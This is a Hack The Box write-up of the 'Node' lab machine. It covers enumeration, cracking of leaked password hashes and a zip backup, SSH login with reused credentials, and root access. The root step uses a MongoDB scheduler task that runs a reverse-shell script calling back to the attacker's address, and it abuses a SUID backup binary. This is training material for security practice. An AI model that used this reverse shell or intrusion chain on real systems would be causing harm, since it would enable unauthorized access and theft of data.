Content
Welcome to the Node writeup from HTB
tags:
Enumeration
Nmap
Port 3000
Exploitation
Fcrackzip
SSH
Post exploitation
SUID
Running process
Privilege escalation
Root flag
Nmap
Port 3000
Exploitation
Fcrackzip
SSH
Post exploitation
SUID
Running process
Privilege escalation
Root flag
Welcome to the Node writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Node
tags: HTB Medium Linux OSCP
Platform: Hackthebox
Difficult: Medium
S.O.: Linux
Link: Click here
Enumeration
Nmap
To get started, we run a quick open ports scan.
# nmap -p- -T4 10.10.10.58
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-25 19:26 CET
Nmap scan report for 10.10.10.58
Host is up (0.093s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
Nmap done: 1 IP address (1 host up) scanned in 92.74 secondsNow that we know the open ports, let's scan them in depth.
# nmap -A -Pn -p 22,3000 10.10.10.58
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-25 19:27 CET
Nmap scan report for 10.10.10.58
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 93.86 ms 10.10.14.1
2 93.88 ms 10.10.10.58
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.28 secondsPort 3000
In port 3000 we can find a web server and by analyzing the source code of the website, we can find several javascript resources.
Inside the admin.js file we can see that it is making a GET request to the URL /api/admin/backup.
var controllers = angular.module('controllers');
controllers.controller('AdminCtrl', function ($scope, $http, $location, $window) {
$scope.backup = function () {
$window.open('/api/admin/backup', '_self');
}
$http.get('/api/session')
.then(function (res) {
if (res.data.authenticated) {
$scope.user = res.data.user;
}
else {
$location.path('/login');
}
});
});When accessing the URL we can find 3 user accounts with their respective hashes.
Using the website crackstation we can get the passwords for tom and mark in plain text.
tom:spongebob
mark:snowflake
rastating:Can’t decrypt itOn the other hand, inside the profile.js file we can find the URL api/users.
var controllers = angular.module('controllers');
controllers.controller('ProfileCtrl', function ($scope, $http, $routeParams) {
$http.get('/api/users/' + $routeParams.username)
.then(function (res) {
$scope.user = res.data;
}, function (res) {
$scope.hasError = true;
if (res.status == 404) {
$scope.errorMessage = 'This user does not exist';
}
else {
$scope.errorMessage = 'An unexpected error occurred';
}
});
});And by accessing the URL api/users we can obtain the 3 previous accounts and a new one, that of the user myP14ceAdm1nAcc0uNT with its hash and who is also an administrator as we can see in the parameteris_admin: true.
And again we can get the password in plain text using the crackstation service.
myP14ceAdm1nAcc0uNT:manchesterNow that we have a user with administrator permissions, we are going to authenticate on the website.
As we can see, we can download a Backup file.
Let's see its content.
# cat myplace.backup | base64 -d > myplace
# file myplace
myplace: Zip archive data, at least v1.0 to extract
root [EvilBook] (10.10.14.7) ~/Descargas
# mv myplace myplace.zipExploitation
Fcrackzip
The zip file is password protected, but we can try to get it using fcrackzip.
# fcrackzip -D -p /usr/share/wordlists/rockyou.txt myplace.zip
possible pw found: magicword ()Great, now we can extract the content.
# unzip myplace.zip
Archive: myplace.zip
[myplace.zip] var/www/myplace/package-lock.json password:
inflating: var/www/myplace/package-lock.json
creating: var/www/myplace/node_modules/
creating: var/www/myplace/node_modules/serve-static/
inflating: var/www/myplace/node_modules/serve-static/README.md
.................................................................
.................................................................The extracted content is a copy of the web application and analyzing its files, inside the app.js file in its first lines we can find the credentials formongodb of the user mark.
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';Maybe they will help us to connect by SSH.
SSH
And we are inside via SSH with the credentials mark:5AYRft73VtFpc84k found!
Post exploitation
SUID
Let's see what we have with the SUID bit set.
mark@node:~$ find / -perm /4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/local/bin/backup
/usr/bin/chfn
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/newuidmap
/bin/ping
/bin/umount
/bin/fusermount
/bin/ping6
/bin/ntfs-3g
/bin/su
/bin/mountThe /usr/local/bin/backup binary has SUID rights but we cannot execute it being mark.
Running process
Let's see what processes tom has running.
mark@node:~$ ps -ef | grep tom
mark 612 596 0 07:43 pts/0 00:00:00 grep --color=auto tom
tom 1229 1 0 Mar25 ? 00:00:07 /usr/bin/node /var/scheduler/app.js
tom 1232 1 0 Mar25 ? 00:00:07 /usr/bin/node /var/www/myplace/app.js
tom 18349 1229 0 Mar25 ? 00:00:00 /bin/sh -c /bin/bash /tmp/shell.sh
tom 18350 18349 0 Mar25 ? 00:00:00 /bin/bash /tmp/shell.sh
tom 18351 18350 0 Mar25 ? 00:00:00 sh -i
tom 18356 18351 0 Mar25 ? 00:00:00 /bin/bash
tom 18358 18356 0 Mar25 ? 00:00:00 python3 -c import pty; pty.spawn('/bin/bash')
tom 18359 18358 0 Mar25 pts/2 00:00:00 /bin/bashtom is running another application with Node called /var/scheduler/app.js. Let's see its content.
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';
MongoClient.connect(url, function(error, db) {
if (error || !db) {
console.log('[!] Failed to connect to mongodb');
return;
}
setInterval(function () {
db.collection('tasks').find().toArray(function (error, docs) {
if (!error && docs) {
docs.forEach(function (doc) {
if (doc) {
console.log('Executing task ' + doc._id + '...');
exec(doc.cmd);
db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
}
});
}
else if (error) {
console.log('Something went wrong: ' + error);
}
});
}, 30000);
});Well, as we see in the code, there is a function that lists all the records of the table tasks of the database scheduler of mongodb and executes with the function exec() the content of the corresponding record with the cmd column, also as we can see, has an interval of 30000 configured so that every 30 seconds it performs this process again.
We should be able to connect to the database and insert a new record with a command to run a reverse shell that we have saved in a script.
Privilege escalation
Well, the first thing we need to do is put a terminal to listen and create the script with the reverse shell inside.
mark@node:/tmp$ cat shell.sh
sh -i >& /dev/tcp/10.10.14.7/8787 0>&1Now, we have to connect to the scheduler database and insert a new record that executes our script. Inserting {cmd:"/bin/bash /tmp/shell.sh"} should work.
mark@node:/home/tom$ mongo localhost:27017/scheduler -u mark -p 5AYRft73VtFpc84k
MongoDB shell version: 3.2.16
connecting to: localhost:27017/scheduler
> sh -i >& /dev/tcp/10.10.14.7/8787 0>&1
2021-03-25T19:45:26.389+0000 E QUERY [thread1] SyntaxError: expected expression, got '&' @(shell):1:7
> db.tasks.find()
> db.tasks.insert({cmd:"/bin/bash /tmp/shell.sh"});
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
{ "_id" : ObjectId("605ce5e877be912640c6765d"), "cmd" : "/bin/bash /tmp/shell.sh" }
>We just have to wait a few seconds... and we have a shell!
# nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.58] 32886
sh: 0: can't access tty; job control turned off
$Perfect, now we can read the user flag inside the tom home.
tom@node:~$ cat user.txt
CENSORED_FLAGRoot flag
Now that we are tom, we can run the SUID backup we found earlier.
As we can see in the app.js file downloaded in the backup of the website, the execution syntax of the binary is /usr/local/bin/backup followed by -q key and the path to perform the backup.
app.get('/api/admin/backup', function (req, res) {
if (req.session.user && req.session.user.is_admin) {
var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
var backup = '';
proc.on("exit", function(exitCode) {
res.header("Content-Type", "text/plain");
res.header("Content-Disposition", "attachment; filename=myplace.backup");
res.send(backup);
});
proc.stdout.on("data", function(chunk) {
backup += chunk;
});
proc.stdout.on("end", function() {
});
}
else {
res.send({
authenticated: false
});
}
});Well, we are going to ask you to make a backup of the root directory. We must remember that the result will be a zip file in base64.
tom@node:~$ /usr/local/bin/backup -q "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474" "/root"
[+] Finished! Encoded backup is below:
UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==Let's decode it.
# echo "UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==" | base64 -d > root.zipIn this case, unzip is not working so we are going to use 7za. The password to unzip is magicword which is the same as we cracked earlier.
# 7za x root.zip
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=es_ES.utf8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz (806EA),ASM,AES-NI)
Scanning the drive for archives:
1 file, 1141 bytes (2 KiB)
Extracting archive: root.zip
--
Path = root.zip
Type = zip
Physical Size = 1141
Enter password (will not be echoed):
Everything is Ok
Size: 2584
Compressed: 1141When unzipping it, we obtain the file root.txt, we are going to read the flag.
# cat root.txt
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP'.yQQQQQQQQQQQP" <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'_a.<aamQQQW!<yF "!` .. "??$Qa "WQQQWTVP' "??' =QQmWWV?46/ ?QQQQQ
QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ
QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ
QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ
QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ
QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^ ` ]6QQ' yQQQQQ
QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" a j/ ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc <aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ
QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6, QWQWQQQk <c jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,., . .; QWQ.]QQQQQQQ
QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,. -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQWow, we've been trolled!
Let's analyze the flow of the program with ltrace.
tom@node:/$ ltrace /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /root
__libc_start_main(0x80489fd, 4, 0xffea6174, 0x80492c0 <unfinished ...>
geteuid() = 1000
setuid(1000) = 0
strcmp("-q", "-q") = 0
strncpy(0xffea6038, "45fac180e9eee72f4fd2d9386ea7033e"..., 100) = 0xffea6038
strcpy(0xffea6021, "/") = 0xffea6021
strcpy(0xffea602d, "/") = 0xffea602d
strcpy(0xffea5fb7, "/e") = 0xffea5fb7
strcat("/e", "tc") = "/etc"
strcat("/etc", "/m") = "/etc/m"
strcat("/etc/m", "yp") = "/etc/myp"
strcat("/etc/myp", "la") = "/etc/mypla"
strcat("/etc/mypla", "ce") = "/etc/myplace"
strcat("/etc/myplace", "/k") = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey") = "/etc/myplace/key"
strcat("/etc/myplace/key", "s") = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r") = 0x95e7008
fgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x95e7008) = 0xffea5bcf
strcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "a01a6aa5aaf1d7729f35c8278daae30f"...) = -1
fgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x95e7008) = 0xffea5bcf
strcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "45fac180e9eee72f4fd2d9386ea7033e"...) = 0
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x95e7008) = 0xffea5bcf
strcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "3de811f4ab2b7543eaf45df611c2dd25"...) = 1
fgets("\n", 1000, 0x95e7008) = 0xffea5bcf
strcspn("\n", "\n") = 0
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "") = 1
fgets(nil, 1000, 0x95e7008) = 0
strstr("/root", "..") = nil
strstr("/root", "/root") = "/root"
strcpy(0xffea4c08, "Finished! Encoded backup is belo"...) = 0xffea4c08
printf(" %s[+]%s %s\n", "\033[32m", "\033[37m", "Finished! Encoded backup is belo"... [+] Finished! Encoded backup is below:
) = 51
puts("UEsDBDMDAQBjAG++IksAAAAA7QMAABgK"...UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==
) = 1525
exit(0 <no return ...>
+++ exited (status 0) +++
tom@node:/$So the binary is comparing that the requested path is /root as we can see here strstr("/root", "/root"). Nothing happens ... we can solve it by assigning in the environment variables that the HOME of tom is /root and thus we can request the binary to backup the tom home.
tom@node:/$ export HOME=/root
tom@node:/$ /usr/local/bin/backup -q "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474" "~"
$ /usr/local/bin/backup -q "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474" "~"
UEsDBAoAAAAAABwWO0sAAAAAAAAAAAAAAAAFABwAcm9vdC9VVAkAA4cDy1mn8FxgdXgLAAEEAAAAAAQAAAAAUEsDBBQACQAIANGDEUd/sK5kgwAAAJQAAAANABwAcm9vdC8ucHJvZmlsZVVUCQADGf7RVafwXGB1eAsAAQQAAAAABAAAAAAqqI3TrmsV+iDiA6QOgcmk55oSaOqGnmlXqXZ+ahOZbgV8qrPj39LuSt3KPACjZrW9Xp6TWBgX8rtVNtt4f9HavJjvH6S53XJSZB/rJnz24O/I5iX+xNbWqod/UYtnSGXJegEJXqmkbVUz/OgH2+/9q1z7kKW1mkoReRfEik99g2zUsVBLBwh/sK5kgwAAAJQAAABQSwMEFAAJAAgAHBY7S9xSZRxNAAAAVQAAABIAHAByb290Ly5iYXNoX2hpc3RvcnlVVAkAA4cDy1mn8FxgdXgLAAEEAAAAAAQAAAAAnS4NpNmo5WmOhsAByMNIrVq6qCCA3sl64viNCoGt4JM0/Nt744Tz+gJSnzyrcJaYadaQnPb/CuHCCjZ4Dw1B/5/7InCiRFEwdBiIz4xQSwcI3FJlHE0AAABVAAAAUEsDBAoAAAAAADR8I0sAAAAAAAAAAAAAAAAMABwAcm9vdC8uY2FjaGUvVVQJAAPDEqxZp/BcYHV4CwABBAAAAAAEAAAAAFBLAwQKAAkAAAA0fCNLAAAAAAwAAAAAAAAAIAAcAHJvb3QvLmNhY2hlL21vdGQubGVnYWwtZGlzcGxheWVkVVQJAAPDEqxZp/BcYHV4CwABBAAAAAAEAAAAAD/HBIzeaYfQgRw/ulBLBwgAAAAADAAAAAAAAABQSwMECgAJAAAA1H0jS/KON0AtAAAAIQAAAA0AHAByb290L3Jvb3QudHh0VVQJAAPQFaxZp/BcYHV4CwABBAAAAAAEAAAAAE38VXQwB0DnuzHbP8jPsNkHNUgfZ6V/S+EcccNOJyJIAQnSwacvQUiUOQxfTVBLBwjyjjdALQAAACEAAABQSwMEFAAJAAgA65FWR73lED6bBQAAIgwAAAwAHAByb290Ly5iYXNocmNVVAkAA6kZKVan8FxgdXgLAAEEAAAAAAQAAAAA9pQQS9gMKo5SCQjLDtSbizUZnLcF8g0Hi5sHa2Phi/GWTh6AQAL6vFf/tEU9sQKubKsF95ejMcS908g4aeQIobyWWnyYLzy3xadAOyoux2OidmdtAKEkx36XznEas/IuCx90GhI9qvIei/taAkp9RNVTfxN4Y0eVcyIznu0N7eREcrcO4Y65Qcc8kuIG3S8NQreHhFLBHxMQwNWGtPUsdfTr2ougr1OZ0gSyLv3f7BqemSg17TPgLnUx7DMKSeBCF3siixjAP9s0H3pfnNZhPZHPdQ/n+6whZdSXNNTemyc+yRZCLLvIcwbx3WM0vSIXH4VqlW7EO/aXOUTYBApoR7w//MDvE+asrPlHhPsI+yr5i5gqSxBIToIXfxAkCvVUcYs4WqUaeLvFkH90pBWThlNXWAn2Q+EB4zfT5dQS01b1BkM3If0w5B8m+RsP4Kz9VUf4d2pM+jKJIqY5leTdwdAc1rWdMth/IMiXLCF6RGjNZErnqBQxLf3K2jipqFkVH6